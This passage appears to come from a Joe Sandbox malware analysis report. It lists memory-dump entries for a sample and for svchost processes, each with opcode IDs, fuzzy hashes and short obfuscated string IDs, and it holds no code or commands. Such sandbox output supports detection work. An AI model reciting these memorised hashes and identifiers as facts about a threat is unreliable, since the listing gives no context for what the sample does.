                                                                    • Opcode Fuzzy Hash: a62a5d46f7f63bf53277c23e84f2d7434ab5b5ac0c43666ed6b436b0918daf81
                                                                    • Instruction Fuzzy Hash: 9F01A4317082504FC34AAB3D985455E7FA7AFDA250B5644FAE14ACB3A6CD288C06C7A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a547c4eafa261dccd5f86feb23c53fae0fca26a084a99f6ba4ca58ed22ca89a
                                                                    • Instruction ID: 7a817e2832ccff41391e1c7493c4010a49c6e228877301d2ed74b46661aa2b1d
                                                                    • Opcode Fuzzy Hash: 4a547c4eafa261dccd5f86feb23c53fae0fca26a084a99f6ba4ca58ed22ca89a
                                                                    • Instruction Fuzzy Hash: 58C13934B102048FCB44EF69D994AAD77F2FF88710B214469E906EB3A5DB75EC42DB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee9e421f13a10ae3e241d29ea45755e9bb1ad29732e43bd7b772806192f43694
                                                                    • Instruction ID: a885e81804144dced63502121ac532e2fae6afc4e99866acfda037084d3dd32b
                                                                    • Opcode Fuzzy Hash: ee9e421f13a10ae3e241d29ea45755e9bb1ad29732e43bd7b772806192f43694
                                                                    • Instruction Fuzzy Hash: 976116787102058FCB48EB68D594A6D77F6FF88710B2144A8E9069B3BADF71EC41DB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c22ec332faf0a8aec61da0df66a55ac936097c2740f72849870f079472fbbbc9
                                                                    • Instruction ID: 202eb4305e999eb66a06e0ef1ba1e1b6483f61a4e54679d91c67a6b1b49199b3
                                                                    • Opcode Fuzzy Hash: c22ec332faf0a8aec61da0df66a55ac936097c2740f72849870f079472fbbbc9
                                                                    • Instruction Fuzzy Hash: 9151E578114201CFC70AEB74E8C5A897B63FB853857509A68D4099F3A9EB319942EFC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 331394ac68f9a6a3b21b675d18da9d36379fc01a2caefdc347116bf3d1ddd073
                                                                    • Instruction ID: 4f36fd1314986dcfa081719ed5a5c202d24abde822c290601d3f00eefd0afef4
                                                                    • Opcode Fuzzy Hash: 331394ac68f9a6a3b21b675d18da9d36379fc01a2caefdc347116bf3d1ddd073
                                                                    • Instruction Fuzzy Hash: 7341A0B0F00249AFCB04EFBA885466EBBBAFF88300F208169D549D7345DA349D429B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07bafa263052bd860aaa7c26aeb3e5fabab100113f4039fae3d6655f59f0f1e4
                                                                    • Instruction ID: 77d1977086ba5471940cd69949ffaf9d85a86124fb22f9e7752f3c114bb2df2f
                                                                    • Opcode Fuzzy Hash: 07bafa263052bd860aaa7c26aeb3e5fabab100113f4039fae3d6655f59f0f1e4
                                                                    • Instruction Fuzzy Hash: 24216B35B001489FE710DFAAC955BAE7BF6FF88720F248165E901EB3A6CA749C40DB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725122983.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c0d000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b876997b665e73955ffb5e7a2800efa1d3b5576d85d5859ec1f3cb2cf7cefca
                                                                    • Instruction ID: bbc3a33148cd4bfa8ef38b37337088495121a008555b984acb9c0cd61a64fdda
                                                                    • Opcode Fuzzy Hash: 7b876997b665e73955ffb5e7a2800efa1d3b5576d85d5859ec1f3cb2cf7cefca
                                                                    • Instruction Fuzzy Hash: EC2142B2504200DFDB05DF84D9C0B26BF65FB98328F20C569ED0B0B296C336D906DBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97be809a9b5a934170a220410e43966acfcd0718da591e61ef2c5b20935b2a9a
                                                                    • Instruction ID: 301062e6f63e24f265ec5ece8242f54842d0ecc629b0eae81d0fd0dd8f4e78e3
                                                                    • Opcode Fuzzy Hash: 97be809a9b5a934170a220410e43966acfcd0718da591e61ef2c5b20935b2a9a
                                                                    • Instruction Fuzzy Hash: 6D219031B0478ADFDB54AF76D95836D3BB0BB46B50700843D9406C61A5EFB88980B791
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3ef583aee1a67ff00471e3d97b45f77c0dde2381f58fc67eb6b98043ab390ea
                                                                    • Instruction ID: 9db4eb51f3d7ff5cdfab30c1e7a372de10a36ef05a3e1852b542772255d9adce
                                                                    • Opcode Fuzzy Hash: b3ef583aee1a67ff00471e3d97b45f77c0dde2381f58fc67eb6b98043ab390ea
                                                                    • Instruction Fuzzy Hash: A5218E30B0038BCFDB58AFB6E95437E3AB4BF45B40700843E9406C11A9EEB8C980B791
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ccc3f26884b3bf723679e647d86fbc5bef798f4d0c53e081a0944626b32ed2f5
                                                                    • Instruction ID: cc4691c94b24317e0c5cff1f08f79d5c9669e9c67d8b47735a579a15140f3346
                                                                    • Opcode Fuzzy Hash: ccc3f26884b3bf723679e647d86fbc5bef798f4d0c53e081a0944626b32ed2f5
                                                                    • Instruction Fuzzy Hash: FB117C70A00211CFCB55EBBAD84866ABBF5BF8A751B1144B9D40ACF3A4EB31DD41DB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725122983.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c0d000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: 81f783cb075be5ef519e068b05fb198fe8c8124e218743f24270e792ad6e2486
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: 1A1103B2404240CFCB12CF44D9C0B16BF72FB94328F24C1A9DD0A0B256C33AD95ACBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4f6e532c7d4d9a4e5be48a47888bae1a4aff7b9b16bccff6e39b51e0dcf06df
                                                                    • Instruction ID: 064621d8c0c37abd4dfcf909db3d50e2c7afef9a07edd9b67c02a591f7db1fc3
                                                                    • Opcode Fuzzy Hash: b4f6e532c7d4d9a4e5be48a47888bae1a4aff7b9b16bccff6e39b51e0dcf06df
                                                                    • Instruction Fuzzy Hash: 9C118B70A00204DFCB44EBBAD844A6E7BE6BF8A31072044B9D00ACB394EA31DD01DB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bcc48dd1e356d9ae6700d9edcbaaa7ee4a1ec47acf7848ad713ebd5713f3a79
                                                                    • Instruction ID: fdec80b80809abe6aa8065f7b3591f09fafa7cd8d7c5a33b2de5d31942396a42
                                                                    • Opcode Fuzzy Hash: 2bcc48dd1e356d9ae6700d9edcbaaa7ee4a1ec47acf7848ad713ebd5713f3a79
• Instruction Fuzzy Hash: C6E086317056605FC301A7B598568CE3F799F8661071500DAE005DF3B7CA258C0683D1
Memory Dump Source
• Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b2c31dc27a38b4c752ef0aa001d0ca42fdcfd6717983d6712050082964ca6321
• Instruction ID: efa5569feadad49c8e8f66b7a6ef2c6c164d54667833ecda8d16bbed15d2014f
• Opcode Fuzzy Hash: b2c31dc27a38b4c752ef0aa001d0ca42fdcfd6717983d6712050082964ca6321
• Instruction Fuzzy Hash: 15E08C313001009F8344966EE88495EB7DBEFC9221314447AE109C7325CD64CC014690
Memory Dump Source
• Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab7d2b4f4b332d0e7fad6bcc0657bf42c84490938fa0fe9d546dde3ce5a900cc
• Instruction ID: 061f583a013dc421b7239d1c77b1260c5aac2dc9da271f9dc3d8c84beeca0d8b
• Opcode Fuzzy Hash: ab7d2b4f4b332d0e7fad6bcc0657bf42c84490938fa0fe9d546dde3ce5a900cc
• Instruction Fuzzy Hash: DDE09B312047D44BDB25D378D01039E7FE29F41318F00496DD19697582CBB7A5455392
Memory Dump Source
• Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a8f95dedec1dfa8b41e756ef14a5ad2cb2a19b41db6ce997c0c7f1f63548a91
• Instruction ID: e7f0f8f0e611844685367fbc17cae31dbad59922b030445fdc840cef42b655fd
• Opcode Fuzzy Hash: 4a8f95dedec1dfa8b41e756ef14a5ad2cb2a19b41db6ce997c0c7f1f63548a91
• Instruction Fuzzy Hash: C3D0A9327001245FC600B7FEE44989E37DEAFCA620B6000AAE105DB3B6CE22EC0043C5
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: 4'fq$LIZh$TJkq$Tefq$pjq$xbiq
• API String ID: 0-357971932
• Opcode ID: e260ccfbbf2bf19c071a766344a0d40a9b17bfccd4ff13efb8389d27911efa45
• Instruction ID: c97c58f29b49667684c155b2b1e4821eda2b16bc1d5ce1ffbfe23bee3b5e8045
• Opcode Fuzzy Hash: e260ccfbbf2bf19c071a766344a0d40a9b17bfccd4ff13efb8389d27911efa45
• Instruction Fuzzy Hash: 7E521B75A10118DFDB15CFA8C984E5ABBB2FF48314F1581A8E609AB362DB31ED51DF40
Strings
Memory Dump Source
• Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
Similarity
• API ID:
• String ID: 4'fq$LIZh$TJkq$Tefq$pjq$xbiq
• API String ID: 0-357971932
• Opcode ID: 96734f50035eb0a3024044ffd5d3277b5e9f322c22f70d0c00f197638b468ccb
• Instruction ID: d19192ed5f0e23d2910adb70c2b5ae9083753deb4e64290bfd2697d6ff9cd678
• Opcode Fuzzy Hash: 96734f50035eb0a3024044ffd5d3277b5e9f322c22f70d0c00f197638b468ccb
• Instruction Fuzzy Hash: D05227B5A00114DFCB15CF68C988E69BBB2FF49314F1981A8E51AAB362DB31EC51DF40
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: LIZh$TJkq$Tefq$xbiq
• API String ID: 0-1093792895
• Opcode ID: 55bae5732214e171b08f0b9f1c4f3e3adda9a4c1c0f3bd8b7065e523b50146df
• Instruction ID: 1c1d7344b0960bf667350ceff2e9ceff9e52a563d8eff0cfa07a27b73c19f6f6
• Opcode Fuzzy Hash: 55bae5732214e171b08f0b9f1c4f3e3adda9a4c1c0f3bd8b7065e523b50146df
• Instruction Fuzzy Hash: B8C13A75E102299FDB15DF68C984BAEBBF2BF88300F1581A9E519EB351DB30AD45CB40
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq
• API String ID: 0-751858264
• Opcode ID: 793afe948c8b088fcb5a9da98a619a734f489e215d8fd9f25b4789db0a415143
• Instruction ID: f3f5a2f80f88cda0e4f897ebbeb9603963dca373d806b0716ec190585b18a035
• Opcode Fuzzy Hash: 793afe948c8b088fcb5a9da98a619a734f489e215d8fd9f25b4789db0a415143
• Instruction Fuzzy Hash: 446126B1A017098FD708DF7AF88869ABBE3FFC8200F14D46AD5049B269EF385945CB55
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq
• API String ID: 0-751858264
• Opcode ID: 359bf7d5d4d435637ad7763874923dd2f04416fe78f583ce085e4fe3b3e53665
• Instruction ID: 908fc610c37d9930ff076a8b7f68a246198b013f8f0a9903b8de522cbf0220d8
• Opcode Fuzzy Hash: 359bf7d5d4d435637ad7763874923dd2f04416fe78f583ce085e4fe3b3e53665
• Instruction Fuzzy Hash: FE5127B0E017098FD708DF6AF888A9ABBE3FFC8200F14D469D5049B269EF385905CB55
Strings
Memory Dump Source
• Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq
• API String ID: 0-751858264
• Opcode ID: e064ee433bbb335e9d91c807a9486f6c51e98a94ea996852d11fb75cd084e99b
• Instruction ID: 95c4b7953605a2f2a1e4e9f4b27452e9a716b5da5bd4445d74fd64b6607118b9
• Opcode Fuzzy Hash: e064ee433bbb335e9d91c807a9486f6c51e98a94ea996852d11fb75cd084e99b
• Instruction Fuzzy Hash: CB5117B0E016048BD74CEF7EE88969ABBE3FFD8200B04C529D404DB264EF392959DB51
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: \VZl
• API String ID: 0-3439240617
• Opcode ID: 8e2c75e5b5c633bb56c7f75b6fbdd9a8e4ee53a15810758c4ce11595c1634cb8
• Instruction ID: 5656d792b5ea60b3a22d92442f813f0ef55a01b936b80152ed0eedbc1dee0ceb
• Opcode Fuzzy Hash: 8e2c75e5b5c633bb56c7f75b6fbdd9a8e4ee53a15810758c4ce11595c1634cb8
• Instruction Fuzzy Hash: 7BB14B70E00219CFDB10DFA9C9857AEFBF2AF88314F14812DE915AB394EB749945CB91
Memory Dump Source
• Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e5853370764a1199cad56449b01909a60e4aaf7b0742609c20bb43fd2382b48
• Instruction ID: 6f5d597a731f793275a78669e966c224c1ce99e487a4c55b2384cee2ba95061b
• Opcode Fuzzy Hash: 5e5853370764a1199cad56449b01909a60e4aaf7b0742609c20bb43fd2382b48
• Instruction Fuzzy Hash: EA623AB4A00206DFCB14DFA8D594AADBBF2FF88310F148569E9059B365DB35ED42CB90
Memory Dump Source
• Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bac335dc6b9f3b289234f0ca328fa93f65e52434122ed9a0fc7bea3d167ee48
• Instruction ID: bee0ba303ffdb2e3b6587f5aa5a1d93e7e991523f8ac88e640c75dc5c4308c7b
• Opcode Fuzzy Hash: 5bac335dc6b9f3b289234f0ca328fa93f65e52434122ed9a0fc7bea3d167ee48
• Instruction Fuzzy Hash: B04239B0B01205DFDB29DFA8C594AAABBF2FF89300F15846AD5159B391DB34EC41CB91
Memory Dump Source
• Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ecc54ae9b45845bbdc5bc32068e74af1fd173f52b1b65b568e1a819291c86ae
• Instruction ID: a088893b55db44192df698bb8d80d5a47bd72ae3dcc7f905c536809ee60951ff
• Opcode Fuzzy Hash: 9ecc54ae9b45845bbdc5bc32068e74af1fd173f52b1b65b568e1a819291c86ae
• Instruction Fuzzy Hash: F6428BB0A00346CFCB25DF29C9946EAB7F2BF85305F14486ED4068B6A0EB75EC85DB51
Memory Dump Source
• Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7bb34461a31876762b7356bc35411557963debbfc8cbd809dec6a9461cf1df17
• Instruction ID: 0d202c00e5f8eac15a3102c6f080d38f71ca46d113d38ed3353b0bcafd26a89c
• Opcode Fuzzy Hash: 7bb34461a31876762b7356bc35411557963debbfc8cbd809dec6a9461cf1df17
• Instruction Fuzzy Hash: 161251B4A002059FCB15DF68C5849AABBF2FF89310B15C59AE509DB362DB30ED45CBA1
Memory Dump Source
• Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7610000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ea2c41ffe45158ace0f449d29e99e4a12aca83c20207b5c9709b1d4d32c0b287
• Instruction ID: e1db82d140b182d6b4fd31fd92c82c028c4d6c3e5e535b1cb1a6f8423218dd2e
• Opcode Fuzzy Hash: ea2c41ffe45158ace0f449d29e99e4a12aca83c20207b5c9709b1d4d32c0b287
• Instruction Fuzzy Hash: 8022E6B4A11229CFCB55DF68C898A99B7F6FF88300F1484D9D94AA7354DB34AE81DF40
Memory Dump Source
• Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c8169845c28bff9b61533f851b417396be2645ac2118d5f88ec57c9571b1563
• Instruction ID: 162c2eeee8f8bbe21c7f57f3a5d8db574ed7871b89e891a6ca47dba61355216a
• Opcode Fuzzy Hash: 8c8169845c28bff9b61533f851b417396be2645ac2118d5f88ec57c9571b1563
• Instruction Fuzzy Hash: F9026BB5A00746CFDB25CF69C584AAABBF2FF48300F15896AE4469B761DB34EC45CB40
Memory Dump Source
• Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1421ddb52d44a323fedb269fa46009f30d53aae12163d0d15a54f337ec5c77c2
• Instruction ID: 02c3b5744d60cada8f09335c697f6f7b2ac231068df4f5c72f745ce71d997248
• Opcode Fuzzy Hash: 1421ddb52d44a323fedb269fa46009f30d53aae12163d0d15a54f337ec5c77c2
• Instruction Fuzzy Hash: DEF12EB4A103059FDB18DFA8D894AEDBBB2FF88300F148969E406AB355DB35DC46DB50
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b620e32917ec8aeea422cadd8d178151db950639a40e07d0af0ce9f5e7efc5bb
• Instruction ID: f1ccc77e5bdc23dce45930be2017ea0f6356f07cbd85c50347316d1a7e1b6d5c
• Opcode Fuzzy Hash: b620e32917ec8aeea422cadd8d178151db950639a40e07d0af0ce9f5e7efc5bb
• Instruction Fuzzy Hash: F0B10771E002098FDF14CFA9C98579EFBF2AF88714F14852DE915AB394EB749885CB81
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dec26ff033ae34dafe2a0b9f1e2194210de5d0ce2a329c9f676d48f56c2c90e8
• Instruction ID: 4ee6408f4603aa404f0a257c519e2c622bd3d825661e292cff9e0bb83c12078b
• Opcode Fuzzy Hash: dec26ff033ae34dafe2a0b9f1e2194210de5d0ce2a329c9f676d48f56c2c90e8
• Instruction Fuzzy Hash: 487112B0D00249DFDB10CFA9C984ADEBFF5EF48314F248059E51AAB354DB75A94ACB90
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: afq$ afq$,$xjq
• API String ID: 0-1502000904
• Opcode ID: f74e9ffa8d210d2c85cfac38c6de9ca4ec13251d8390ee7f58c71f90d874bd19
• Instruction ID: 1332ebbd9e1f4ce722a27298db8c28d40171b92530be7c64209c5b2cd7c86251
• Opcode Fuzzy Hash: f74e9ffa8d210d2c85cfac38c6de9ca4ec13251d8390ee7f58c71f90d874bd19
• Instruction Fuzzy Hash: E702BC70B00201CFD715DF28E594B2AB7A2FB88314F20856DDA169B3A6DF75DC45CB91
Strings
Memory Dump Source
• Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
Similarity
• API ID:
• String ID: #3Wk^$33Wk^$2Wk^
• API String ID: 0-3380813285
• Opcode ID: bf27b01f5ad3f6a60e567019665de26254a1af7d98fcb6a6c28b2b6ea549641e
• Instruction ID: 709d1ffbbabfd77582f310aae9cc30701c9394527793b63fb53ba19be037102c
• Opcode Fuzzy Hash: bf27b01f5ad3f6a60e567019665de26254a1af7d98fcb6a6c28b2b6ea549641e
• Instruction Fuzzy Hash: 17E149F0B106469FCB15DAA8E951BDA77E2FB85740B10892EE816DB344EB34DC058B94
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: afq$ afq$xjq
• API String ID: 0-3115423142
• Opcode ID: 7a9912439855c8200166a1ff5d3a5a244436e87c4c79f3b4f657d47d1376156c
• Instruction ID: cebb11339983cf5b09fc572ee09ffde6b04bc861521267ff7f25e74773d8d15b
• Opcode Fuzzy Hash: 7a9912439855c8200166a1ff5d3a5a244436e87c4c79f3b4f657d47d1376156c
• Instruction Fuzzy Hash: 66617970700300DFD719DB28E854B5ABBB2FB89354F20896DDA069B3A5DF729D45CB90
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: (jq$Tefq$dp
• API String ID: 0-640866979
• Opcode ID: 607be32b941604f6be36eecfcc0ae5ca30fc1c5a2ba50e8516dfdbbb4c4b1065
• Instruction ID: d2b1b90b707a2bc8b8ad900cae71153d639a1f7bf0791358e379634c8f8cf3f4
• Opcode Fuzzy Hash: 607be32b941604f6be36eecfcc0ae5ca30fc1c5a2ba50e8516dfdbbb4c4b1065
• Instruction Fuzzy Hash: C9519D34B101149FCB44DF6DC458A5EBBF6BF89710F2580A9E606EB3A5CA71DC01CB90
Strings
Memory Dump Source
• Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$LRfq
• API String ID: 0-634477706
• Opcode ID: 9c806694be2052c7bfcdc78beba7fd01da911f72715236bfa7cc52e2823a8cf2
• Instruction ID: bdfa55ccd220943e6d91a3ec0ff351c25aacdd2c033f0ea8355f5e627f78a336
• Opcode Fuzzy Hash: 9c806694be2052c7bfcdc78beba7fd01da911f72715236bfa7cc52e2823a8cf2
• Instruction Fuzzy Hash: 6231A330B04106DBCB48EBBCE4557AFBBB1FB85314F10459DE6059B2A5EB356D058782
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,jq$,jq
                                                                    • API String ID: 0-3554820393
                                                                    • Opcode ID: 6bf6c02d0c90fe304b88f5d58edc068345ef6bb8a2392cf3a75c519054c1d094
